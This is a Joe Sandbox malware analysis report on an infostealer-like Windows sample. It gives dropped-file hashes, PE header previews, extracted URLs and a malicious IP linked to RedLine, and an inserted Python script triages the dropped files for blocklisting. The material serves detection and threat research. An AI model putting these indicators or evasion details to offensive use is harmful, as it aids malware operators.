                      https://api.ip.sb/ipEco.pif, 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id20RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id21RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id22RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id23RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorMmReveals.exe, 00000003.00000000.1652016339.0000000000408000.00000002.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp, is-RISCU.tmp.1.drfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id24RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.autodesk.com/0http://www.autodesk.com/0http://www.autodesk.com/Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id10RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id11RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id12RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id13 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id14 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id15 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id16 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id17 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id18 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id5Response | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id19 | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002821000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id15ResponseD | RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id10Response | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id11ResponseD | RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id8Response | RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0 | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity | RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.140.147.183 | unknown | United Kingdom | 44486 | SYNLINQsynlinqdeDE | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483221
Start date and time: 2024-07-26 21:20:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
Detection: MAL
Classification: mal72.troj.spyw.evad.winEXE@34/46@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 94
• Number of non-executed functions: 303
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
Time | Type | Description
15:21:40 | API Interceptor | 39x Sleep call for process: Eco.pif modified
Match | Associated Sample Name / URL | Detection | Threat Name
45.140.147.183 | 7632e569071acc40bce87af592e4cc2476d9c088906a1.exe | malicious | RedLine
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SYNLINQsynlinqdeDE | 7632e569071acc40bce87af592e4cc2476d9c088906a1.exe | malicious | RedLine | 45.140.147.183
SYNLINQsynlinqdeDE | 3wdC6zhiOR.exe | malicious | MicroClip | 45.140.146.248
SYNLINQsynlinqdeDE | 3wdC6zhiOR.exe | malicious | MicroClip | 45.140.146.248
SYNLINQsynlinqdeDE | HajjReport.docm | malicious | Unknown | 45.140.147.81
SYNLINQsynlinqdeDE | HajjReport.docm | malicious | Unknown | 45.140.147.81
SYNLINQsynlinqdeDE | HajjReport.docm | malicious | Unknown | 45.140.147.81
SYNLINQsynlinqdeDE | HajjReport.docm | malicious | Unknown | 45.140.147.81
SYNLINQsynlinqdeDE | https://coanj.com/ | malicious | Unknown | 45.140.146.101
SYNLINQsynlinqdeDE | https://stay.linestoget.com/scripts/get.js?ver=4.2.1 | malicious | Unknown | 45.140.146.101
No context
No context
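The dropped-file records that follow are exported in a flat "Key:Value" form, one field per line, with the sandbox's own Malicious verdict, the ReversingLabs detection ratio and the entropy/encryption fields all carried separately. As an added example (not part of the Joe Sandbox report), the script below parses that form into structured records and triages them on three criteria that, on this report's own data, disagree with each other: the sandbox marks Eco.pif malicious although no AV engine detects it, and the file typed "OpenPGP Secret Key" is flagged by nothing but has the entropy of an encrypted payload. The sample input is constructed from three records shown on this page (Preview bytes omitted); the thresholds and reason labels are my own choices, not the report's.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: three dropped-file records in the flattened
# "Key:Value" form of this text export, values copied from the report
# (Preview bytes omitted). Raw string, so the Windows paths need no escaping.
SAMPLE_RECORDS = r"""
Process:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):975909
Entropy (8bit):7.977422924365237
Encrypted:false
MD5:5223A85FF161E8818F0E514048051E7D
SHA-256:7632E569071ACC40BCE87AF592E4CC2476D9C088906A1E6651614860B4754BF8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 39%
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):937776
Entropy (8bit):6.777413141364669
Encrypted:false
MD5:B06E67F9767E5023892D9698703AD098
SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\cmd.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):410350
Entropy (8bit):7.999534336762385
Encrypted:true
MD5:AFA99B9D405658F98DE0E2F688B11799
SHA-256:923EAAAEE7BD9310AD06297C07FBBFBD4801A1AC30DA2DE21FB59FF28F958936
Malicious:false
"""


@dataclass
class DroppedFile:
    process: str = ""
    file_type: str = ""
    category: str = ""
    size: int = 0
    entropy: float = 0.0
    encrypted: bool = False
    md5: str = ""
    sha256: str = ""
    malicious: bool = False
    av_detections: dict = field(default_factory=dict)  # engine -> percent


TEXT_KEYS = {"File Type": "file_type", "Category": "category",
             "MD5": "md5", "SHA-256": "sha256"}
# Matches the bulleted per-engine lines, e.g. "• Antivirus: ReversingLabs, Detection: 39%"
AV_RE = re.compile(r"^[•*-]?\s*Antivirus:\s*(?P<engine>[^,]+),\s*Detection:\s*(?P<pct>\d+)%")


def parse_dropped_files(text):
    """Split the flat export into DroppedFile records; a 'Process:' line opens a new one.
    Works whether or not the export has a space after the colon."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = AV_RE.match(line)
        if m and cur is not None:
            cur.av_detections[m["engine"].strip()] = int(m["pct"])
            continue
        key, sep, value = line.partition(":")   # first colon only: paths contain "C:\"
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Process":
            cur = DroppedFile(process=value)
            records.append(cur)
        elif cur is None:
            continue
        elif key in TEXT_KEYS:
            setattr(cur, TEXT_KEYS[key], value.upper() if key in ("MD5", "SHA-256") else value)
        elif key == "Size (bytes)":
            cur.size = int(value)
        elif key == "Entropy (8bit)":
            cur.entropy = float(value)
        elif key in ("Encrypted", "Malicious"):
            setattr(cur, key.lower(), value.lower() == "true")
    return records


def triage(records, min_detection=1, entropy_floor=7.9):
    """Map sha256 -> reasons for every file worth blocking or pulling for analysis.
    Thresholds are assumptions for this example, not values from the report."""
    result = {}
    for r in records:
        reasons = []
        if r.malicious:
            reasons.append("sandbox flagged malicious")
        if any(p >= min_detection for p in r.av_detections.values()):
            reasons.append("AV detection")
        if r.encrypted or r.entropy >= entropy_floor:
            reasons.append("encrypted or packed blob")
        if reasons:
            result[r.sha256] = reasons
    return result


if __name__ == "__main__":
    for sha, why in triage(parse_dropped_files(SAMPLE_RECORDS)).items():
        print(sha, "->", "; ".join(why))
```

Relying on any one of the three signals alone would miss something on this report: AV ratio alone drops Eco.pif and the encrypted blobs, the sandbox verdict alone drops the high-entropy containers that the unpacking stage consumes, and the entropy rule alone drops the renamed binary. Feeding the whole dropped-file section through the same parser gives a hash list that a blocklist or a retro-hunt can use directly.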
Process: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1750211
Entropy (8bit): 7.15738162690574
Encrypted: false
SSDEEP: 24576:Y4nXubIQGyxbPV0db26Kn54SqBIvEYDSp9r0327fkcZKq:Yqe3f6+abK8RXr0G7fkcMq
MD5: 1C83CFBC97F7BC13E849E9E1AF8E7DA7
SHA1: 6E282C51B6AD9FD4ABEB5A1AE8A02C3768F4947B
SHA-256: AFFB554F0E0AC980517EACD5CB576F0D0CA24FCEED6D874B33D6E252AADCAA0E
SHA-512: EEC5FB6DEE7D26579205EB481760239A5FDA74A3E886E8E3634A01127F62C4F5B7AB696ABCEC11A56D7DFC6B0ED66CD1A1CAFE81422E0D333740BEE867E9CE21
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.......................................@......@...................@....... ..6....p...f...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....f...p...h..................@..@....................................@..@........................................................
Process: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1750211
Entropy (8bit): 7.15738162690574
Encrypted: false
SSDEEP: 24576:Y4nXubIQGyxbPV0db26Kn54SqBIvEYDSp9r0327fkcZKq:Yqe3f6+abK8RXr0G7fkcMq
MD5: 1C83CFBC97F7BC13E849E9E1AF8E7DA7
SHA1: 6E282C51B6AD9FD4ABEB5A1AE8A02C3768F4947B
SHA-256: AFFB554F0E0AC980517EACD5CB576F0D0CA24FCEED6D874B33D6E252AADCAA0E
SHA-512: EEC5FB6DEE7D26579205EB481760239A5FDA74A3E886E8E3634A01127F62C4F5B7AB696ABCEC11A56D7DFC6B0ED66CD1A1CAFE81422E0D333740BEE867E9CE21
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.......................................@......@...................@....... ..6....p...f...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....f...p...h..................@..@....................................@..@........................................................
Process: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 975909
Entropy (8bit): 7.977422924365237
Encrypted: false
SSDEEP: 24576:oXwOyoMvAJeqI8X6aGvX2T8NZrymq1I1bYSLsbUAYilGEADGKel:bFvAJeq7KmQ/rymq6YSLsbDdrqGKel
MD5: 5223A85FF161E8818F0E514048051E7D
SHA1: 9574D384A9F3B449F64CF14A022DF3C8C383E279
SHA-256: 7632E569071ACC40BCE87AF592E4CC2476D9C088906A1E6651614860B4754BF8
SHA-512: A7860963EA26BE9A3F41AEA30BACE94211BFE36D249062D1B91833A2675C4DDF7C60387BC0C167A484DA4F228DE382B8A0D054EDAFE49D59080452C601E8A950
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 39%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...A..............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....A...@...B..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 975909
Entropy (8bit): 7.977422924365237
Encrypted: false
SSDEEP: 24576:oXwOyoMvAJeqI8X6aGvX2T8NZrymq1I1bYSLsbUAYilGEADGKel:bFvAJeq7KmQ/rymq6YSLsbDdrqGKel
MD5: 5223A85FF161E8818F0E514048051E7D
SHA1: 9574D384A9F3B449F64CF14A022DF3C8C383E279
SHA-256: 7632E569071ACC40BCE87AF592E4CC2476D9C088906A1E6651614860B4754BF8
SHA-512: A7860963EA26BE9A3F41AEA30BACE94211BFE36D249062D1B91833A2675C4DDF7C60387BC0C167A484DA4F228DE382B8A0D054EDAFE49D59080452C601E8A950
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 39%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...A..............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....A...@...B..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 3094
Entropy (8bit): 5.33145931749415
Encrypted: false
SSDEEP: 96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5: 3FD5C0634443FB2EF2796B9636159CB6
SHA1: 366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256: 58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512: 8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious: false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 937776
Entropy (8bit): 6.777413141364669
Encrypted: false
SSDEEP: 12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
MD5: B06E67F9767E5023892D9698703AD098
SHA1: ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
SHA-256: 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
SHA-512: 7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\154571\Eco.pif
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 65440
Entropy (8bit): 6.049806962480652
Encrypted: false
SSDEEP: 768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5: 0D5DF43AF2916F47D00C1573797C1A13
SHA1: 230AB5559E806574D26B4C20847C368ED55483B0
SHA-256: C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
